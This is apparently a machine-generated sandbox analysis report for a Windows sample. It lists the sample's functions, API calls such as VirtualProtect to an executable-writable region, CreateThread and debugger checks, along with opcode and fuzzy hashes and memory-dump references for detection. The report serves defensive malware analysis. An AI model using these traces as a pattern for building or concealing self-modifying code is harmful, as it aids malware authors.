Associated: 00000007.00000002.2628282533.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628347685.00000000004FE000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628368794.00000000004FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628392885.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628429547.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_d1834e5726.jbxd

Similarity

API ID: ErrorExitLastThread
String ID: f2N
API String ID: 1611280651-3473888870
Opcode ID: 02a54155eece2e3df80eedfc2814b410ab4ed659052674555a485a816384a1a4
Instruction ID: e5499e37a5df0167cfa0d112ea412135bdaacc9748f0f3c350b30184e27580a4
Opcode Fuzzy Hash: 02a54155eece2e3df80eedfc2814b410ab4ed659052674555a485a816384a1a4
Instruction Fuzzy Hash: 51F0A4719002889FDB11EBB2D94AA7E3B74EF00716F10409EF10557292CF786901CB99

Function 004E1710 Relevance: 4.6, APIs: 3, Instructions: 60
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004E1000: _strlen.LIBCMT ref: 004E108D

FreeConsole.KERNELBASE ref: 004E1741

Part of subcall function 004E13F0: CoResumeClassObjects.OLE32 ref: 004E150E
Part of subcall function 004E13F0: KiUserExceptionDispatcher.NTDLL(00000000,00000000,00000000), ref: 004E1521

VirtualProtect.KERNELBASE(004FE01C,00000549,00000040,?), ref: 004E1790
ExitProcess.KERNEL32 ref: 004E17C6

Memory Dump Source

Source File: 00000007.00000002.2628242726.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2628185054.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628282533.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628347685.00000000004FE000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628368794.00000000004FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628392885.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628429547.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_d1834e5726.jbxd

Similarity

API ID: ClassConsoleDispatcherExceptionExitFreeObjectsProcessProtectResumeUserVirtual_strlen
String ID:
API String ID: 3360678313-0
Opcode ID: 37e0462a87ac615a01fcede80e369ca1f482848640c9d2baf18cd87870cb570a
Instruction ID: c9775d3ef9fa125b41cd5f49edd8bd1f5bb0321b2802426cef8de4b2bfe16e01
Opcode Fuzzy Hash: 37e0462a87ac615a01fcede80e369ca1f482848640c9d2baf18cd87870cb570a
Instruction Fuzzy Hash: ED110A31A401587FEB00AF669C03FBF3765DB44706F54443AFA08A72D2DAB9AA10869D

Function 004E6F9F Relevance: 4.6, APIs: 3, Instructions: 51
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,Function_000070B7,00000000,00000000,00000000), ref: 004E6FE8
GetLastError.KERNEL32(?,?,?,?,004E1DD3,00000000,00000000), ref: 004E6FF4
__dosmaperr.LIBCMT ref: 004E6FFB

Memory Dump Source

Source File: 00000007.00000002.2628242726.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2628185054.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628282533.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628347685.00000000004FE000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628368794.00000000004FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628392885.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628429547.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_d1834e5726.jbxd

Similarity

API ID: CreateErrorLastThread__dosmaperr
String ID:
API String ID: 2744730728-0
Opcode ID: 3b74aff23386065b8c07dd5feb0bd4eb9287980d48e75b8039214d5985410ce9
Instruction ID: b362c99da66026b033fb486e4cf7a110629f6f46d02add6b5161226796827ebd
Opcode Fuzzy Hash: 3b74aff23386065b8c07dd5feb0bd4eb9287980d48e75b8039214d5985410ce9
Instruction Fuzzy Hash: 6801B532504189AFDF15AFA2DC05AAF3B65EF00376F00015AF80196250DB39CE50D798

Function 004E20C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Xinvalid_argument.LIBCPMT ref: 004E20C5

Part of subcall function 004E2CA2: std::invalid_argument::invalid_argument.LIBCONCRT ref: 004E2CAE
Part of subcall function 004E2CA2: std::exception::exception.LIBCMT ref: 004E2CCB

Part of subcall function 004E2D17: GetCurrentThreadId.KERNEL32 ref: 004E2D42

Strings

string too long, xrefs: 004E20C0

Memory Dump Source

Source File: 00000007.00000002.2628242726.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2628185054.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628282533.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628347685.00000000004FE000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628368794.00000000004FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628392885.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628429547.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_d1834e5726.jbxd

Similarity

API ID: CurrentThreadXinvalid_argumentstd::_std::exception::exceptionstd::invalid_argument::invalid_argument
String ID: string too long
API String ID: 2087764332-2556327735
Opcode ID: ea25064bc79fa01fab05690a53fff7dbad9bd56d3c3304f2fa1e1a1509b4381c
Instruction ID: a3c031ba00d276bf7840393761c7ef0a02e80acd41470f831ebd850bf2d13e01
Opcode Fuzzy Hash: ea25064bc79fa01fab05690a53fff7dbad9bd56d3c3304f2fa1e1a1509b4381c
Instruction Fuzzy Hash: 8B01FDB1D002489FCB00DFA6C842B9FBBB9FB04720F10823AE90563740D3B99A00CAE5

Function 004EF4C2 Relevance: 3.2, APIs: 2, Instructions: 196
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004EF86C: GetConsoleOutputCP.KERNEL32(98F3976D,00000000,00000000,?), ref: 004EF8CF

WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,?,?,?,004E56A2,?,004E5904), ref: 004EF647
GetLastError.KERNEL32(?,004E56A2,?,004E5904,?,004E5904,?,?,?,?,?,?,?,00000000,?,?), ref: 004EF651

Memory Dump Source

Source File: 00000007.00000002.2628242726.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2628185054.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628282533.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628347685.00000000004FE000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628368794.00000000004FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628392885.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628429547.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_d1834e5726.jbxd

Similarity

API ID: ConsoleErrorFileLastOutputWrite
String ID:
API String ID: 2915228174-0
Opcode ID: 6f1116e3b07d31e20e67a9850fd4de3f3b3aa258d8dd3d9b565cd7589b32fe85
Instruction ID: 4444cf87d6aad851908f1d6eb37854d74cb5da679fd5432e0e308d3f281cb231
Opcode Fuzzy Hash: 6f1116e3b07d31e20e67a9850fd4de3f3b3aa258d8dd3d9b565cd7589b32fe85
Instruction Fuzzy Hash: 5461D7B1800189BFDF11DFAAC844EBF7BB5AF19309F14016AE804A7252D339D91ACB59

Function 004E234A Relevance: 3.1, APIs: 2, Instructions: 94
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004E3F3E: RaiseException.KERNEL32(E06D7363,00000001,00000003,004E20CA,?,?,?,004E2CC1,004E20CA,004FD820,?,004E20CA,string too long,004E12D2), ref: 004E3F9F

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004E2E92
___raise_securityfailure.LIBCMT ref: 004E2F7A

Memory Dump Source

Source File: 00000007.00000002.2628242726.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2628185054.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628282533.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628347685.00000000004FE000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628368794.00000000004FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628392885.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628429547.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_d1834e5726.jbxd

Similarity

API ID: ExceptionFeaturePresentProcessorRaise___raise_securityfailure
String ID:
API String ID: 3749517692-0
Opcode ID: b89b16f6a2f964e6c7ecf51b35a657b0b6ae4691646e616e946717ec89b37205
Instruction ID: a310077d5f56fb07b3ea866318ecfc1a60c8410fa19944a826af9c14708d528e
Opcode Fuzzy Hash: b89b16f6a2f964e6c7ecf51b35a657b0b6ae4691646e616e946717ec89b37205
Instruction Fuzzy Hash: 2C318DB8900309ABD700DF6AFD45A647BA8BF04305F21847AED14C73B1E7B59669CB8C

Function 004EFC9B Relevance: 3.1, APIs: 2, Instructions: 80
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,004EF62D,?,004E5904,?,?,?,00000000), ref: 004EFD37
GetLastError.KERNEL32(?,004EF62D,?,004E5904,?,?,?,00000000,?,?,?,?,?,004E56A2,?,004E5904), ref: 004EFD5D

Memory Dump Source

Source File: 00000007.00000002.2628242726.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2628185054.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628282533.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628347685.00000000004FE000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628368794.00000000004FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628392885.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628429547.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_d1834e5726.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: 57a16b802d438437c79cef63a02c34afa9964cb80ea9bf00e3a45f64b03a0de2
Instruction ID: 98962bf43f4c5cb01f50bfdaccaa6012dd9e4f3d960185c25d82c8493d511d95
Opcode Fuzzy Hash: 57a16b802d438437c79cef63a02c34afa9964cb80ea9bf00e3a45f64b03a0de2
Instruction Fuzzy Hash: 3121B431A002599FCB15CF2ADD809E9B7B9FF49306F2044BAE906D7311D6349E46CF68

Function 004EA59C Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,004EA48B,004FDC40,0000000C), ref: 004EA5E8
GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,004EA48B,004FDC40,0000000C), ref: 004EA5FA

Memory Dump Source

Source File: 00000007.00000002.2628242726.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2628185054.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628282533.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628347685.00000000004FE000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628368794.00000000004FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628392885.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628429547.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_d1834e5726.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 0e4edb3d2904e8844c208b218a5c481db6aab763f229ddc79ee50567962981d4
Instruction ID: 11804fdf98923da27c0ca38cfddc7afcf529d079a3b70161064953d057cdca9c
Opcode Fuzzy Hash: 0e4edb3d2904e8844c208b218a5c481db6aab763f229ddc79ee50567962981d4
Instruction Fuzzy Hash: 2B11D57150478156C7304E3F8C886337A94A797376B39071BE0F6826F1C628E967C25B

Function 004E9C89 Relevance: 1.6, APIs: 1, Instructions: 56
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.2628242726.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2628185054.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628282533.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628347685.00000000004FE000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628368794.00000000004FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628392885.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628429547.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_d1834e5726.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2351cf46ceb4bc4f6060a469b9d2cc2a4aa5e7e41572a3cd84e16ab6959eb5a
Instruction ID: 8bc2b38e25526ba49b5d3e4280bcc0bdf6649b36cffdb36e1b3694c2882b204c
Opcode Fuzzy Hash: b2351cf46ceb4bc4f6060a469b9d2cc2a4aa5e7e41572a3cd84e16ab6959eb5a
Instruction Fuzzy Hash: 6F01D233600265AFDB029E6BFC8496637E6BB817223244526FA15C72E8DA349C11D78D

Function 004EB8D6 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,004EAB77,?,?,004EAB77,00000220,?,00000000,?), ref: 004EB908

Memory Dump Source

Source File: 00000007.00000002.2628242726.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2628185054.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628282533.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628347685.00000000004FE000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628368794.00000000004FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628392885.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628429547.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_d1834e5726.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 472b32a57f2d3c67883305e627bc6b6eee3d5a515dbb1f223f74ed7377af9ee5
Instruction ID: c23b5654662f043a65e10f018f53f38b2d83993f721d4c0168a21bf66557d14e
Opcode Fuzzy Hash: 472b32a57f2d3c67883305e627bc6b6eee3d5a515dbb1f223f74ed7377af9ee5
Instruction Fuzzy Hash: 66E0A0311012E566DA2036639C01B7B364CDB413A6F150127ED08963A2CB288D0095FD

Non-executed Functions

Function 004F1A10 Relevance: 6.5, APIs: 4, Instructions: 455COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2628242726.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2628185054.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628282533.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628347685.00000000004FE000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628368794.00000000004FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628392885.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628429547.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_d1834e5726.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7946e7d3bd8a4c71b1004167feaff1146a0b4289e9922db4fb30fff94b398ee0
Instruction ID: c395606fd1b3a71c2300a007e3a781ce5cf0bcb956fb9cbc4c5ea10631d6fa53
Opcode Fuzzy Hash: 7946e7d3bd8a4c71b1004167feaff1146a0b4289e9922db4fb30fff94b398ee0
Instruction Fuzzy Hash: 22023D71E01219DBDF14CFA9C980AAEBBB1FF49314F24826ADA15E7350D735AA01CB94

Function 004ED922 Relevance: 6.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004EDA12

Memory Dump Source

Source File: 00000007.00000002.2628242726.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2628185054.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628282533.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628347685.00000000004FE000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628368794.00000000004FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628392885.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628429547.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_d1834e5726.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 56284418b3cac183010dd286b12ba015729ffcab22b5262812da05654a76aed4
Instruction ID: 9cb8db5a398baf25ea408c6947827964e0fff2bb0efb087fbed6c2c368c6d888
Opcode Fuzzy Hash: 56284418b3cac183010dd286b12ba015729ffcab22b5262812da05654a76aed4
Instruction Fuzzy Hash: 2471D4B1D041985FDF20EF26CC89ABAB7B9EF05305F1441EBE449A7251EA385E858F18

Function 004E39F1 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 004E39FD
IsDebuggerPresent.KERNEL32 ref: 004E3AC9
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004E3AE2
UnhandledExceptionFilter.KERNEL32(?), ref: 004E3AEC

Memory Dump Source

Source File: 00000007.00000002.2628242726.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2628185054.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628282533.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628347685.00000000004FE000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628368794.00000000004FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628392885.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628429547.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_d1834e5726.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 42e566195971a8affdb01bd09a1e9deafb93bf1cad67a6f74299b8098f6b5023
Instruction ID: 6859b25dada4fd463706a887458e82804bdefdc2cb6406f6515909c40dbb0cd7
Opcode Fuzzy Hash: 42e566195971a8affdb01bd09a1e9deafb93bf1cad67a6f74299b8098f6b5023
Instruction Fuzzy Hash: 00312975C0521C9BDB21DF65DD89BCDBBB8AF48305F1041AAE40DAB250E7749B84CF49

Function 004E8077 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 004E816F
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 004E8179
UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 004E8186

Memory Dump Source

Source File: 00000007.00000002.2628242726.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2628185054.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628282533.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628347685.00000000004FE000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628368794.00000000004FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628392885.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628429547.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_d1834e5726.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: b7ad93e49c80e710d349f304922d99ddf5a12e82f98c4e97a8bf8e150d9a67e4
Instruction ID: 87dd4998d4b610e05412291f08a1d0f09d9edd10f8873b0aac633736456b8987
Opcode Fuzzy Hash: b7ad93e49c80e710d349f304922d99ddf5a12e82f98c4e97a8bf8e150d9a67e4
Instruction Fuzzy Hash: EA31D67490122C9BCB21DF69DD8879DBBB8BF48311F5041EAE40CA7251EB749F858F48

Function 004ED871 Relevance: 1.7, APIs: 1, Instructions: 199fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004EB78E: HeapAlloc.KERNEL32(00000008,?,?,?,004E9EC4,00000001,00000364,?,00000006,000000FF,?,004E70DC,004FD900,0000000C), ref: 004EB7CF

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004EDA12
FindNextFileW.KERNEL32(00000000,?), ref: 004EDB06
FindClose.KERNEL32(00000000), ref: 004EDB45
FindClose.KERNEL32(00000000), ref: 004EDB78

Memory Dump Source

Source File: 00000007.00000002.2628242726.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2628185054.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628282533.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628347685.00000000004FE000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628368794.00000000004FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628392885.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628429547.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_d1834e5726.jbxd

Similarity

API ID: Find$CloseFile$AllocFirstHeapNext
String ID:
API String ID: 2701053895-0
Opcode ID: 5f95860cf3ed1003860763d1d17916bac639699e12d48c4b1c3c5f045cd68506
Instruction ID: 5f5bdfd39460d23d56d6e7638618367513c817d66a3504fb311680f6018fadfe
Opcode Fuzzy Hash: 5f95860cf3ed1003860763d1d17916bac639699e12d48c4b1c3c5f045cd68506
Instruction Fuzzy Hash: 36516AB5D00188AEDB10AF2B9C849BF77B9DF85309F14419FF45893302EA388D418B28

Function 004E39E5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00003B06,004E349D), ref: 004E39EA

Memory Dump Source

Source File: 00000007.00000002.2628242726.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2628185054.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628282533.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628347685.00000000004FE000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628368794.00000000004FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628392885.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628429547.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_d1834e5726.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 7658d39bf2fe18a26340153b74e48fda1d3732a9e30913557ebc4c871094c58f
Instruction ID: 87896d7c71bca3f0d53fd5cbfd3714e11bb28efe6e4c5312765a0b531e3b15b1
Opcode Fuzzy Hash: 7658d39bf2fe18a26340153b74e48fda1d3732a9e30913557ebc4c871094c58f
Instruction Fuzzy Hash:

Function 004E9E16 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 004E9E16

Memory Dump Source

Source File: 00000007.00000002.2628242726.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2628185054.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628282533.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628347685.00000000004FE000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628368794.00000000004FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628392885.0000000000501000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628429547.0000000000503000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_d1834e5726.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 65c409bd50040fb34324ea962991c1f99ef8b5a10af6e81bad596c3121a57227
Instruction ID: f44ef86ae50c82e341c1b038bd6da8132618999ab6bab171c3ff541d3bf7761f
Opcode Fuzzy Hash: 65c409bd50040fb34324ea962991c1f99ef8b5a10af6e81bad596c3121a57227
Instruction Fuzzy Hash: C6A011B0202200CB83008F32AA083283AA8BA022E0B028038A008C2020EB208220EF08

Function 004E4650 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 122COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 004E4687
___except_validate_context_record.LIBVCRUNTIME ref: 004E468F
_ValidateLocalCookies.LIBCMT ref: 004E4718
__IsNonwritableInCurrentImage.LIBCMT ref: 004E4743
_ValidateLocalCookies.LIBCMT ref: 004E4798

Strings

]CN, xrefs: 004E4735, 004E473E, 004E474F
csm, xrefs: 004E472D
f2N, xrefs: 004E475C

Memory Dump Source

Source File: 00000007.00000002.2628242726.00000000004E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2628185054.00000000004E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628282533.00000000004F6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2628347685.00000000004FE000.00000040.00000001.01000000.00000009.sdmpDownload File
